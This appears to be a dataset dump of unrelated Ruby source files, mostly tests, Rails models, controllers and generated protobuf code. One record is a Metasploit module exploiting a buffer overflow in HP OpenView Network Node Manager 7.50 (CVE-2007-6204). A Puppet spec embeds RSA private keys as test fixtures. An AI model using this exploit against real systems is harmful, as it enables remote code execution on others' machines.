hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
918a85158f83ec29b1a05dae7ea29183869cc866 | 2,677 | require 'ostruct'
require_relative '../spec_helper_lite'
require_relative '../fixtures/models/tag_list'
describe TagList do
include Conversions
describe "given a blank string" do
before do
@it = TagList.new("")
end
it "is empty" do
@it.must_be_empty
end
it "stringifies to the empty string" do
@it.to_s.must_equal ""
end
it "arrayifies to the empty array" do
@it.to_a.must_equal []
end
end
describe "given tags separated by commas or whitespace" do
before do
@it = TagList.new("barley, hops water, yeast")
end
it "is not empty" do
@it.wont_be_empty
end
it "stringifies to a comma separated list" do
@it.to_s.must_equal "barley, hops, water, yeast"
end
it "arrayifies to a list of strings" do
@it.to_a.must_equal %w[barley hops water yeast]
end
end
describe "given duplicate tags" do
before do
@it = TagList.new("barley, hops, barley")
end
it "eliminates duplicates" do
@it.to_a.must_equal %w(barley hops)
end
end
describe "given mixed-case tags" do
before do
@it = TagList.new("Barley, hOps, YEAST")
end
it "lowercases the tags" do
@it.to_a.must_equal %w(barley hops yeast)
end
end
describe "given duplicate mixed case tags" do
before do
@it = TagList.new("barley, hops, BarlEy")
end
it "eliminates duplicates ignoring case" do
@it.to_a.must_equal %w(barley hops)
end
end
describe "given nil" do
before do
@it = TagList.new(nil)
end
it "is empty" do
@it.must_be_empty
end
end
describe "#+" do
it "combines tag lists into one" do
result = TagList.new("foo, bar") + TagList.new("baz, buz")
result.must_equal(TagList.new("foo, bar, baz, buz"))
end
end
describe "#alphabetical" do
before do
@it = TagList.new("foo, bar, baz, fuz")
@result = @it.alphabetical
end
it "returns the tags in alpha order" do
@result.to_a.must_equal %w(bar baz foo fuz)
end
it "returns another tag list" do
@result.must_be_kind_of TagList
@result.wont_be_same_as @it
end
end
describe "TagList()" do
describe "given a TagList" do
it "returns the same tag list" do
list = TagList.new("")
TagList(list).must_be_same_as(list)
end
end
describe "given an array" do
before do
@it = TagList(%w[foo bar])
end
it "returns a tag list" do
@it.must_be_kind_of(TagList)
end
it "contains the given tags" do
@it.to_a.must_equal(%w[foo bar])
end
end
end
end
| 20.751938 | 64 | 0.617482 |
26778083c5190ea4d9ae46b365a15e8c590cbf00 | 1,021 | class Githubris::OAuth
REQUEST_ACCESS_URL = Addressable::URI.parse("https://github.com/login/oauth/authorize")
def initialize(client_id, client_secret, api=Githubris::API.new)
@client_id = client_id
@client_secret = client_secret
@api = api
end
def request_access_url(query={})
add_query_params_to(REQUEST_ACCESS_URL, query).to_s
end
def access_token(code)
@api.post_oauth_access_token(access_token_params(code))
end
private
def add_query_params_to(uri, query)
uri.tap do |uri|
uri.query_values = query_values(query)
uri.query = URI.decode(uri.query)
end
end
def query_values(query)
{ :client_id => @client_id }.tap do |query_values|
query_values[:scopes] = query[:scopes].join(',') if query[:scopes]
query_values[:redirect_uri] = query[:redirect_uri] if query[:redirect_uri]
end
end
def access_token_params(code)
{
:client_id => @client_id,
:client_secret => @client_secret,
:code => code
}
end
end
| 24.309524 | 89 | 0.688541 |
6a17d932d034efe2eb5979204432ed87c1a8efe2 | 2,744 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe GitlabSchema.types['TerraformStateVersion'] do
include GraphqlHelpers
it { expect(described_class.graphql_name).to eq('TerraformStateVersion') }
it { expect(described_class).to require_graphql_authorizations(:read_terraform_state) }
describe 'fields' do
let(:fields) { %i[id created_by_user job download_path serial created_at updated_at] }
it { expect(described_class).to have_graphql_fields(fields) }
it { expect(described_class.fields['id'].type).to be_non_null }
it { expect(described_class.fields['createdByUser'].type).not_to be_non_null }
it { expect(described_class.fields['job'].type).not_to be_non_null }
it { expect(described_class.fields['downloadPath'].type).not_to be_non_null }
it { expect(described_class.fields['serial'].type).not_to be_non_null }
it { expect(described_class.fields['createdAt'].type).to be_non_null }
it { expect(described_class.fields['updatedAt'].type).to be_non_null }
end
describe 'query' do
let_it_be(:project) { create(:project) }
let_it_be(:user) { create(:user) }
let_it_be(:terraform_state) { create(:terraform_state, :with_version, :locked, project: project) }
before do
project.add_developer(user)
end
let(:query) do
<<~GRAPHQL
query {
project(fullPath: "#{project.full_path}") {
terraformState(name: "#{terraform_state.name}") {
latestVersion {
id
job {
name
}
}
}
}
}
GRAPHQL
end
subject(:execute) { GitlabSchema.execute(query, context: { current_user: user }).as_json }
shared_examples 'returning latest version' do
it 'returns latest version of terraform state' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion')).to match a_graphql_entity_for(
terraform_state.latest_version
)
end
end
it_behaves_like 'returning latest version'
it 'returns job of the latest version' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion', 'job')).to be_present
end
context 'when user cannot read jobs' do
before do
allow(Ability).to receive(:allowed?).and_call_original
allow(Ability).to receive(:allowed?).with(user, :read_commit_status, terraform_state.latest_version).and_return(false)
end
it_behaves_like 'returning latest version'
it 'does not return job of the latest version' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion', 'job')).not_to be_present
end
end
end
end
| 33.876543 | 126 | 0.667638 |
1c61d3c888955760b71dede53cef785145ae4029 | 2,657 | class User < ApplicationRecord
include Mergeable
enum sync_approval_status: {
requested: 'requested',
allowed: 'allowed',
denied: 'denied'
}, _prefix: true
has_secure_password
has_many :user_facilities, dependent: :delete_all
has_many :facilities, through: :user_facilities
has_many :blood_pressures
has_many :patients, through: :blood_pressures
has_many :audit_logs, as: :auditable
before_create :set_otp
before_create :set_access_token
validates :full_name, presence: true
validates :phone_number, presence: true, uniqueness: true
validates :password, allow_blank: true, length: { is: 4 }, format: { with: /[0-9]/, message: 'only allows numbers' }
validate :presence_of_password
def presence_of_password
unless password_digest.present? || password.present?
errors.add(:password, 'Either password_digest or password should be present')
end
end
def set_otp
generated_otp = self.class.generate_otp
self.otp = generated_otp[:otp]
self.otp_valid_until = generated_otp[:otp_valid_until]
end
def set_access_token
self.access_token = self.class.generate_access_token
end
def sync_approval_denied(reason = "")
self.sync_approval_status = :denied
self.sync_approval_status_reason = reason
end
def sync_approval_allowed(reason = "")
self.sync_approval_status = :allowed
self.sync_approval_status_reason = reason
end
def sync_approval_requested(reason)
self.sync_approval_status = :requested
self.sync_approval_status_reason = reason
end
def self.generate_otp
digits = FeatureToggle.enabled?('FIXED_OTP_ON_REQUEST_FOR_QA') ? [0] : (0..9).to_a
otp = ''
6.times do
otp += digits.sample.to_s
end
otp_valid_until = Time.now + ENV['USER_OTP_VALID_UNTIL_DELTA_IN_MINUTES'].to_i.minutes
{ otp: otp, otp_valid_until: otp_valid_until }
end
def self.generate_access_token
SecureRandom.hex(32)
end
def access_token_valid?
self.sync_approval_status_allowed?
end
def otp_valid?
otp_valid_until >= Time.now
end
def mark_as_logged_in
now = Time.now
self.otp_valid_until = now
self.logged_in_at = now
save
end
def has_never_logged_in?
!logged_in_at.present?
end
def reset_login
self.logged_in_at = nil
end
def self.requested_sync_approval
where(sync_approval_status: :requested)
end
def reset_password(password_digest)
self.password_digest = password_digest
self.set_access_token
self.sync_approval_requested(I18n.t('reset_password'))
end
def registered_at_facility
self.facilities.order(:created_at).first
end
end
| 24.376147 | 118 | 0.736921 |
5d328efe0079f3e8ef4fa70763d8b17c3dbd99fc | 848 | class MainController < ApplicationController
before_action :current_election
def search
if @current_election.state == 'all'
@states = State.ransack(name_cont: search_params).result(distinct: true)
end
@districts = District.election(@current_election).
ransack(name_cont: search_params).result(distinct: true)
@municipalities = Municipality.election(@current_election).
ransack(name_cont: search_params).result(distinct: true)
respond_to do |format|
format.html {}
format.json {
if @current_election.state == 'all'
@states = @states.limit(3)
end
@districts = @districts.limit(6)
@municipalities = @municipalities.limit(10)
}
end
end
private
def search_params
params[:q].gsub(' ','').gsub(/[^0-9a-z\-üßöäA-ZÜÖÄ ]/i, '')
end
end
| 27.354839 | 78 | 0.658019 |
1cc74a6c7b9c98dd9e81364189e5e42b49bc8dce | 3,687 | require "app/presenters/weekly_calendar_presenter"
require "app/queries/show_weekly_calendar"
RSpec.describe Carpanta::Presenters::WeeklyCalendarPresenter do
let(:date) { Date.new(2021, 1, 28) }
let(:weekly_calendar) do
Carpanta::Queries::ShowWeeklyCalendar::WeeklyCalendar.new(
date: Domain::Shared::Date.new(date),
appointments: []
)
end
subject { described_class.new(weekly_calendar) }
describe "#days_of_week" do
it "responds to days_of_week" do
expect(subject).to respond_to(:days_of_week)
end
end
describe "#unique_month_year" do
let(:date) { Date.new(2020, 12, 17) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Dec 2020")
end
context "when there are dates from different months" do
let(:date) { Date.new(2020, 11, 30) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Nov - Dec 2020")
end
end
context "when there are dates from different years" do
let(:date) { Date.new(2020, 12, 31) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Dec 2020 - Jan 2021")
end
end
end
describe "#weekday_name_and_day_of_month" do
let(:date) { Date.new(2020, 12, 21) }
it "displays abbreviated weekday name followed by day of the month" do
result = subject.weekday_name_and_day_of_month(date)
expect(result).to eq("Mon 21")
end
end
describe "#grid_area" do
let(:time) { Time.new(2020, 12, 28, 17, 0, 0) }
let(:duration) { 30 }
it "returns grid column, grid row start and grid row end" do
result = subject.grid_area(time: time, duration: 30)
expect(result).to eq("grid-column: 3; grid-row-start: 23; grid-row-end: 24;")
end
end
describe "#today_link" do
let(:date) { Date.new(2020, 12, 28) }
before do
allow(Time).to receive(:now).and_return(Time.new(2021, 2, 3, 8, 10, 0))
end
it "returns a link to the weekly calendar for today's date" do
result = subject.today_link
expect(result).to eq("/calendar/week/2021-02-03")
end
end
describe "#previous_link" do
let(:date) { Date.new(2020, 12, 28) }
it "returns a link to the weekly calendar for the previous week of a date" do
result = subject.previous_link
expect(result).to eq("/calendar/week/2020-12-21")
end
end
describe "#next_link" do
let(:date) { Date.new(2020, 12, 28) }
it "returns a link to the weekly calendar for the next week of a date" do
result = subject.next_link
expect(result).to eq("/calendar/week/2021-01-04")
end
end
describe "#current_time_in_week?" do
let(:date) { Date.new(2020, 12, 28) }
it "returns true" do
allow(Time).to receive(:now).and_return(Time.new(2020, 12, 28, 8, 25, 0))
result = subject.current_time_in_week?
expect(result).to eq(true)
end
it "returns false" do
result = subject.current_time_in_week?
expect(result).to eq(false)
end
end
describe "#grid_area_for_current_time_in_week" do
it "returns grid column, grid row start and grid row end" do
allow(Time).to receive(:now).and_return(Time.new(2021, 2, 4, 8, 40, 0))
result = subject.grid_area_for_current_time_in_week
expect(result).to eq("grid-column: 6; grid-row-start: 7; grid-row-end: 7;")
end
end
end
| 28.145038 | 102 | 0.66287 |
110a1d85b72c5acb1f865adc4cb5319186e11ea4 | 779 | actions :add, :remove, :enable, :disable
default_action :add
attribute :service, kind_of: String, required: true,
equal_to: %w(accessibility calendar contacts icloud location reminders)
attribute :applications, kind_of: [Array, NilClass], default: nil
attribute :user, kind_of: [String, NilClass], default: nil
attribute :language, kind_of: [String, NilClass], default: nil
attribute :log_dest, kind_of: [String, NilClass], default: nil
attribute :admin, kind_of: [TrueClass, FalseClass], default: false # admin deprecated, use no_check_bin
attribute :no_check_bin, kind_of: [TrueClass, FalseClass], default: false
attribute :forceroot, kind_of: [TrueClass, FalseClass], default: false
attribute :template, kind_of: [TrueClass, FalseClass], default: false
| 48.6875 | 103 | 0.758665 |
1a004997249e8d596a3c07af939469c9886581cc | 180 | class CreateTestLogs < ActiveRecord::Migration
def change
create_table :test_logs do |t|
t.string :cno
t.integer :city_code
t.timestamps
end
end
end
| 16.363636 | 46 | 0.666667 |
39d88336061f24abc153abe30dc2c2b4ffa0c4f3 | 502 | class Agents::SessionsController < Devise::SessionsController
# before_filter :configure_sign_in_params, only: [:create]
# GET /resource/sign_in
# def new
# super
# end
# POST /resource/sign_in
# def create
# super
# end
# DELETE /resource/sign_out
# def destroy
# super
# end
# protected
# If you have extra params to permit, append them to the sanitizer.
# def configure_sign_in_params
# devise_parameter_sanitizer.for(:sign_in) << :attribute
# end
end
| 19.307692 | 69 | 0.691235 |
08a24234e7896c8a7f58f4ab2de7388380b32a3a | 8,199 | # frozen_string_literal: true
require 'spec_helper'
describe 'validate_x509_rsa_key_pair' do
let(:valid_cert) do
<<DOC
-----BEGIN CERTIFICATE-----
MIIC9jCCAeCgAwIBAgIRAK11n3X7aypJ7FPM8UFyAeowCwYJKoZIhvcNAQELMBIx
EDAOBgNVBAoTB0FjbWUgQ28wHhcNMTUxMTIzMjIzOTU4WhcNMTYxMTIyMjIzOTU4
WjASMRAwDgYDVQQKEwdBY21lIENvMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAz9bY/piKahD10AiJSfbI2A8NG5UwRz0r9T/WfvNVdhgrsGFgNQjvpUoZ
nNJpQIHBbgMOiXqfATFjJl5FjEkSf7GUHohlGVls9MX2JmVvknzsiitd75H/EJd+
N+k915lix8Vqmj8d1CTlbF/8tEjzANI67Vqw5QTuqebO7rkIUvRg6yiRfSo75FK1
RinCJyl++kmleBwQZBInQyg95GvJ5JTqMzBs67DeeyzskDhTeTePRYVF2NwL8QzY
htvLIBERTNsyU5i7nkxY5ptUwgFUwd93LH4Q19tPqL5C5RZqXxhE51thOOwafm+a
W/cRkqYqV+tv+j1jJ3WICyF1JNW0BQIDAQABo0swSTAOBgNVHQ8BAf8EBAMCAKAw
EwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAUBgNVHREEDTALggls
b2NhbGhvc3QwCwYJKoZIhvcNAQELA4IBAQAzRo0hpVTrFQZLIXpwvKwZVGvJdCkV
P95DTsSk/VTGV+/YtxrRqks++hJZnctm2PbnTsCAoIP3AMx+vicCKiKrxvpsLU8/
+6cowUbcuGMdSQktwDqbAgEhQlLsETll06w1D/KC+ejOc4+LRn3GQcEyGDtMk/EX
IeAvBZHr4/kVXWnfo6kzCLcku1f8yE/yDEFClZe9XV1Lk/s+3YfXVtNnMJJ1giZI
QVOe6CkmuQq+4AtIeW8aLkvlfp632jag1F77a1y+L268koKkj0hBMrtcErVQaxmq
xym0+soR4Tk4pTIGckeFglrLxkP2JpM/yTwSEAVlmG9vgTliYKyR0uMl
-----END CERTIFICATE-----
DOC
end
let(:valid_key) do
<<DOC
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAz9bY/piKahD10AiJSfbI2A8NG5UwRz0r9T/WfvNVdhgrsGFg
NQjvpUoZnNJpQIHBbgMOiXqfATFjJl5FjEkSf7GUHohlGVls9MX2JmVvknzsiitd
75H/EJd+N+k915lix8Vqmj8d1CTlbF/8tEjzANI67Vqw5QTuqebO7rkIUvRg6yiR
fSo75FK1RinCJyl++kmleBwQZBInQyg95GvJ5JTqMzBs67DeeyzskDhTeTePRYVF
2NwL8QzYhtvLIBERTNsyU5i7nkxY5ptUwgFUwd93LH4Q19tPqL5C5RZqXxhE51th
OOwafm+aW/cRkqYqV+tv+j1jJ3WICyF1JNW0BQIDAQABAoIBADAiZ/r+xP+vkd5u
O61/lCBFzBlZQecdybJw6HJaVK6XBndA9hESUr4LHUdui6W+51ddKd65IV4bXAUk
zCKjQb+FFvLDT/bA+TTvLATUdTSN7hJJ3OWBAHuNOlQklof6JCB0Hi4+89+P8/pX
eKUgR/cmuTMDT/iaXdPHeqFbBQyA1ZpQFRjN5LyyJMS/9FkywuNc5wlpsArtc51T
gIKENUZCuPhosR+kMFc2iuTNvqZWPhvouSrmhi2O6nSqV+oy0+irlqSpCF2GsCI8
72TtLpq94Grrq0BEH5avouV+Lp4k83vO65OKCQKUFQlxz3Xkxm2U3J7KzxqnRtM3
/b+cJ/kCgYEA6/yOnaEYhH/7ijhZbPn8RujXZ5VGJXKJqIuaPiHMmHVS5p1j6Bah
2PcnqJA2IlLs3UloN+ziAxAIH6KCBiwlQ/uPBNMMaJsIjPNBEy8axjndKhKUpidg
R0OJ7RQqMShOJ8akrSfWdPtXC/GBuwCYE//t77GgZaIMO3FcT9EKA48CgYEA4Xcx
Fia0Jg9iyAhNmUOXI6hWcGENavMx01+x7XFhbnMjIKTZevFfTnTkrX6HyLXyGtMU
gHOn+k4PE/purI4ARrKO8m5wYEKqSIt4dBMTkIXXirfQjXgfjR8E4T/aPe5fOFZo
7OYuxLRtzmG1C2sW4txwKAKX1LaWcVx/RLSttSsCgYBbcj8Brk+F6OJcqYFdzXGJ
OOlf5mSMVlopyg83THmwCqbZXtw8L6kAHqZrl5airmfDSJLuOQlMDoZXW+3u3mSC
d5TwVahVUN57YDgzaumBLyMZDqIz0MZqVy23hTzkV64Rk9R0lR9xrYQJyMhw4sYL
2f0mCTsSpzz+O+t9so+i2QKBgEC38gMlwPhb2kMI/x1LZYr6uzUu5qcYf+jowy4h
KZKGwkKQj0zXFEB1FV8nvtpCP+irRmtIx6L13SYi8LnfWPzyLE4ynVdES5TfVAgd
obQOdzx+XwL8xDHCAaiWp5K3ZeXKB/xYZnxYPlzLdyh76Ond1OPnOqX4c16+6llS
c7pZAoGATd9NckT0XtXLEsF3IraDivq8dP6bccX2DNfS8UeEvRRrRwpFpSRrmuGb
jbG4yzoIX4RjQfj/z48hwhJB+cKiN9WwcPsFXtHe7v3F6BRwK0JUfrCiXad8/SGZ
KAf7Dfqi608zBdnPWHacre2Y35gPHB00nFQOLS6u46aBNSq07YA=
-----END RSA PRIVATE KEY-----
DOC
end
let(:another_valid_key) do
<<DOC
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAoISxYJBTPAeAzFnm+lE/ljLlmGal2Xr3vwZKkvJiuKA/m4QJ
0ZNdtkBSDOVuG2dXVv6W4sChRtsCdvuVe7bjTYvlU8TWM3VEJDL9l9cRXScxxlKQ
Xwb35y1yV35NJfaK/jzm9KcErtQQs1RxvGlWRaohmLM8uQcuhjZfMsSlQoHQD5LX
sbPtk82RPyxYc1dj2vsaoi1VvuP2+jv4xLQOmNJY1bT5GTurqiltmxEtWhNNmGg0
2wtK00ifqLVO5HNc3gXQCDM2M99Sbmn1YtbrgsU9xMYfcPmvQvb+YoKskyoqck+c
HR//hi7vslbxABrny15LBkEfRc4TickphSGYXwIDAQABAoIBAATEzGw8/WwMIQRx
K06GeWgh7PZBHm4+m/ud2TtSXiJ0CE+7dXs3cJJIiOd/LW08/bhE6gCkjmYHfaRB
Ryicv1X/cPmzIFX5BuQ4a5ZGOmrVDkKBE27vSxAgJoR46RvWnjx9XLMp/xaekDxz
psldK8X4DvV1ZbltgDFWji947hvyqUtHdKnkQnc5j7aCIFJf9GMfzaeeDPMaL8WF
mVL4iy9EAOjNOHBshZj/OHyU5FbJ8ROwZQlCOiLCdFegftSIXt8EYDnjB3BdsALH
N6hquqrD7xDKyRbTD0K7lqxUubuMwTQpi61jZD8TBTXEPyFVAnoMpXkc0Y+np40A
YiIsR+kCgYEAyrc4Bh6fb9gt49IXGXOSRZ5i5+TmJho4kzIONrJ7Ndclwx9wzHfh
eGBodWaw5CxxQGMf4vEiaZrpAiSFeDffBLR+Wa2TFE5aWkdYkR34maDjO00m4PE1
S+YsZoGw7rGmmj+KS4qv2T26FEHtUI+F31RC1FPohLsQ22Jbn1ORipsCgYEAyrYB
J2Ncf2DlX1C0GfxyUHQOTNl0V5gpGvpbZ0WmWksumYz2kSGOAJkxuDKd9mKVlAcz
czmN+OOetuHTNqds2JJKKJy6hJbgCdd9aho3dId5Xs4oh4YwuFQiG8R/bJZfTlXo
99Qr02L7MmDWYLmrR3BA/93UPeorHPtjqSaYU40CgYEAtmGfWwokIglaSDVVqQVs
3YwBqmcrla5TpkMLvLRZ2/fktqfL4Xod9iKu+Klajv9ZKTfFkXWno2HHL7FSD/Yc
hWwqnV5oDIXuDnlQOse/SeERb+IbD5iUfePpoJQgbrCQlwiB0TNGwOojR2SFMczf
Ai4aLlQLx5dSND9K9Y7HS+8CgYEAixlHQ2r4LuQjoTs0ytwi6TgqE+vn3K+qDTwc
eoods7oBWRaUn1RCKAD3UClToZ1WfMRQNtIYrOAsqdveXpOWqioAP0wE5TTOuZIo
GiWxRgIsc7TNtOmNBv+chCdbNP0emxdyjJUIGb7DFnfCw47EjHnn8Guc13uXaATN
B2ZXgoUCgYAGa13P0ggUf5BMJpBd8S08jKRyvZb1CDXcUCuGtk2yEx45ern9U5WY
zJ13E5z9MKKO8nkGBqrRfjJa8Xhxk4HKNFuzHEet5lvNE7IKCF4YQRb0ZBhnb/78
+4ZKjFki1RrWRNSw9TdvrK6qaDKgTtCTtfRVXAYQXUgq7lSFOTtL3A==
-----END RSA PRIVATE KEY-----
DOC
end
# rubocop:enable Layout/IndentHeredoc
let(:valid_cert_but_indented) do
valid_cert.gsub(%r{^}, ' ')
end
let(:valid_key_but_indented) do
valid_key.gsub(%r{^}, ' ')
end
let(:malformed_cert) do
truncate_middle(valid_cert)
end
let(:malformed_key) do
truncate_middle(valid_key)
end
let(:bad_cert) do
'foo'
end
let(:bad_key) do
'bar'
end
context 'with function signature validation' do
it { is_expected.not_to eq(nil) }
it { is_expected.to run.with_params.and_raise_error(Puppet::ParseError, %r{wrong number of arguments}i) }
it { is_expected.to run.with_params(0, 1, 2, 3).and_raise_error(Puppet::ParseError, %r{wrong number of arguments}i) }
end
context 'with valid input' do
describe 'valid certificate and key' do
it { is_expected.to run.with_params(valid_cert, valid_key) }
end
end
context 'with bad input' do
describe 'valid certificate, valid but indented key' do
it { is_expected.to run.with_params(valid_cert, valid_key_but_indented).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid certificate, malformed key' do
it { is_expected.to run.with_params(valid_cert, malformed_key).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid certificate, bad key' do
it { is_expected.to run.with_params(valid_cert, bad_key).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid but indented certificate, valid key' do
it { is_expected.to run.with_params(valid_cert_but_indented, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'malformed certificate, valid key' do
it { is_expected.to run.with_params(malformed_cert, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'bad certificate, valid key' do
it { is_expected.to run.with_params(bad_cert, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'validate certificate and key; certficate not signed by key' do
it { is_expected.to run.with_params(valid_cert, another_valid_key).and_raise_error(Puppet::ParseError, %r{Certificate signature does not match supplied key}) }
end
describe 'valid cert and key but arguments in wrong order' do
it { is_expected.to run.with_params(valid_key, valid_cert).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'non-string arguments' do
it { is_expected.to run.with_params({}, {}).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(1, 1).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(true, true).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params('foo', {}).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(1, 'bar').and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params('baz', true).and_raise_error(Puppet::ParseError, %r{is not a string}) }
end
end
def truncate_middle(string)
chars_to_truncate = 48
middle = (string.length / 2).floor
start_pos = middle - (chars_to_truncate / 2)
end_pos = middle + (chars_to_truncate / 2)
string[0..start_pos] + string[end_pos..-1]
end
end
| 45.049451 | 165 | 0.832297 |
03c4b2151dd5c4791019ba07a2ccc0d6170a34ca | 136 | require 'test_helper'
class FoodControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
| 17 | 58 | 0.735294 |
21cd59856a013bedfcc740b0c89668129bbd4253 | 1,438 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/services/invoice_service.proto
require 'google/protobuf'
require 'google/ads/google_ads/v3/enums/month_of_year_pb'
require 'google/ads/google_ads/v3/resources/invoice_pb'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/services/invoice_service.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.services.ListInvoicesRequest" do
optional :customer_id, :string, 1
optional :billing_setup, :string, 2
optional :issue_year, :string, 3
optional :issue_month, :enum, 4, "google.ads.googleads.v3.enums.MonthOfYearEnum.MonthOfYear"
end
add_message "google.ads.googleads.v3.services.ListInvoicesResponse" do
repeated :invoices, :message, 1, "google.ads.googleads.v3.resources.Invoice"
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Services
ListInvoicesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.ListInvoicesRequest").msgclass
ListInvoicesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.ListInvoicesResponse").msgclass
end
end
end
end
end
| 38.864865 | 155 | 0.757302 |
62dd81185305d6c8cad5a60ca186796d03954ccb | 471 | module Pod
module Generator
class BridgeSupport
extend Executable
executable :gen_bridge_metadata
attr_reader :headers
def initialize(headers)
@headers = headers
end
def search_paths
@headers.map { |header| "-I '#{header.dirname}'" }.uniq
end
def save_as(pathname)
gen_bridge_metadata %{-c "#{search_paths.join(' ')}" -o '#{pathname}' '#{headers.join("' '")}'}
end
end
end
end
| 20.478261 | 103 | 0.59448 |
0320087ee8f0819cfd7f04030d6e30eb6f212f65 | 94 | class Tag < ActiveRecord::Base
has_many :taggings
has_many :tasks, through: :taggings
end
| 18.8 | 37 | 0.755319 |
edff3b0c55e0053fb558bec68281fff2c2ada6c1 | 1,813 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-6204' ],
[ 'OSVDB', '39530' ],
[ 'BID', '26741' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2007'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
connect
sploit = "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123)
sploit << [target.ret].pack('V') + payload.encoded
print_status("Trying target %s..." % target.name)
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
| 27.892308 | 107 | 0.548814 |
38094eecebf968a51ed800b1c91a550fc498de86 | 5,677 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/logging/v2/logging.proto
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
require 'google/api/monitored_resource_pb'
require 'google/api/resource_pb'
require 'google/logging/v2/log_entry_pb'
require 'google/logging/v2/logging_config_pb'
require 'google/protobuf/duration_pb'
require 'google/protobuf/empty_pb'
require 'google/protobuf/field_mask_pb'
require 'google/protobuf/timestamp_pb'
require 'google/rpc/status_pb'
require 'google/api/annotations_pb'
require 'google/protobuf'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/logging/v2/logging.proto", :syntax => :proto3) do
add_message "google.logging.v2.DeleteLogRequest" do
optional :log_name, :string, 1
end
add_message "google.logging.v2.WriteLogEntriesRequest" do
optional :log_name, :string, 1
optional :resource, :message, 2, "google.api.MonitoredResource"
map :labels, :string, :string, 3
repeated :entries, :message, 4, "google.logging.v2.LogEntry"
optional :partial_success, :bool, 5
optional :dry_run, :bool, 6
end
add_message "google.logging.v2.WriteLogEntriesResponse" do
end
add_message "google.logging.v2.WriteLogEntriesPartialErrors" do
map :log_entry_errors, :int32, :message, 1, "google.rpc.Status"
end
add_message "google.logging.v2.ListLogEntriesRequest" do
repeated :resource_names, :string, 8
optional :filter, :string, 2
optional :order_by, :string, 3
optional :page_size, :int32, 4
optional :page_token, :string, 5
end
add_message "google.logging.v2.ListLogEntriesResponse" do
repeated :entries, :message, 1, "google.logging.v2.LogEntry"
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.ListMonitoredResourceDescriptorsRequest" do
optional :page_size, :int32, 1
optional :page_token, :string, 2
end
add_message "google.logging.v2.ListMonitoredResourceDescriptorsResponse" do
repeated :resource_descriptors, :message, 1, "google.api.MonitoredResourceDescriptor"
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.ListLogsRequest" do
optional :parent, :string, 1
optional :page_size, :int32, 2
optional :page_token, :string, 3
repeated :resource_names, :string, 8
end
add_message "google.logging.v2.ListLogsResponse" do
repeated :log_names, :string, 3
optional :next_page_token, :string, 2
end
add_message "google.logging.v2.TailLogEntriesRequest" do
repeated :resource_names, :string, 1
optional :filter, :string, 2
optional :buffer_window, :message, 3, "google.protobuf.Duration"
end
